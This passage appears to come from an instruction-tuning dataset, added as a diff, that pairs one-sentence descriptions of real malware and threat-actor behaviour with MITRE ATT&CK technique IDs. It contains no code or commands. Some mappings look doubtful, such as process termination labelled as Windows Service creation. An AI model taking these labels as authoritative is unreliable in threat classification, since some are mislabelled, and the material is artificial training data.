techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.", + "output": "- T1495: Firmware Corruption" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Skidmap is a kernel-mode rootkit used for cryptocurrency mining.", + "output": "- T1496: Resource Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bumblebee has the ability to perform anti-virtualization checks.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium can use junk code to generate random activity to obscure malware behavior.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAWKBALL has methods to check if the process the malware uses is being debugged.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kevin can sleep for a time interval between C2 communication attempts.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lucifer can crash a debugger by passing a format string to \"\"OutputDebugStringA()\"\".\"", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Metamorfo has embedded a \"\"vmdetect.exe\"\" executable to identify virtual machines at the beginning of execution.\"", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pteranodon has the ability to use anti-detection functions to identify sandbox environments.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"\"License.txt\"\" and exiting.\"", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.", + "output": "- T1499: Endpoint Denial of Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.", + "output": "- T1499.004: Endpoint Denial of Service - Application or System Exploitation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has used various MS-SQL stored procedures.", + "output": "- T1505.001: Server Software Component - SQL Stored Procedures" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet used xp_cmdshell to store and execute SQL code.", + "output": "- T1505.001: Server Software Component - SQL Stored Procedures" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.", + "output": "- T1505.002: Server Software Component - Transport Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.", + "output": "- T1505.004: Server Software Component - IIS Components" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RGDoor establishes persistence on webservers as an IIS module.", + "output": "- T1505.004: Server Software Component - IIS Components" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ComRAT can check the victim's default browser to determine which process to inject its communications module into.", + "output": "- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.", + "output": "- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.", + "output": "- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host.", + "output": "- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET uses \"\"ps aux\"\" with the \"\"grep\"\" command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.\"", + "output": "- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has used WMI queries to detect if virtualization environments or analysis tools were running on the system.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Netwalker can detect and terminate active security software-related processes on infected systems.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RTM can obtain information about security software on the victim.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rocke used scripts which detected and uninstalled antivirus software.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ThiefQuest uses the \"\"kill_unwanted\"\" function to get a list of running processes, compares each process with an encrypted list of \u201cunwanted\u201d security related programs, and kills the processes for security related programs.\"", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.", + "output": "- T1526: Cloud Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as \"\"Google Defender\"\" \"\"Google Email Protection,\"\" and \"\"Google Scanner\"\" for Gmail users. They also targeted Yahoo users with applications masquerading as \"\"Delivery Service\"\" and \"\"McAfee Email Protection\"\".\"", + "output": "- T1528: Steal Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peirates gathers Kubernetes service account tokens using a variety of techniques.", + "output": "- T1528: Steal Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.", + "output": "- T1530: Data from Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.", + "output": "- T1543: Create or Modify System Process" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard has started a monero service.", + "output": "- T1543.002: Create or Modify System Process - Systemd Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot can terminate a specific process by its process id.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Conficker copies itself into the \"\"%systemroot%\\system32\"\" directory and registers as a service.\"", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dyre registers itself as a service by adding several Registry keys.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emissary is capable of configuring itself as a service.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE 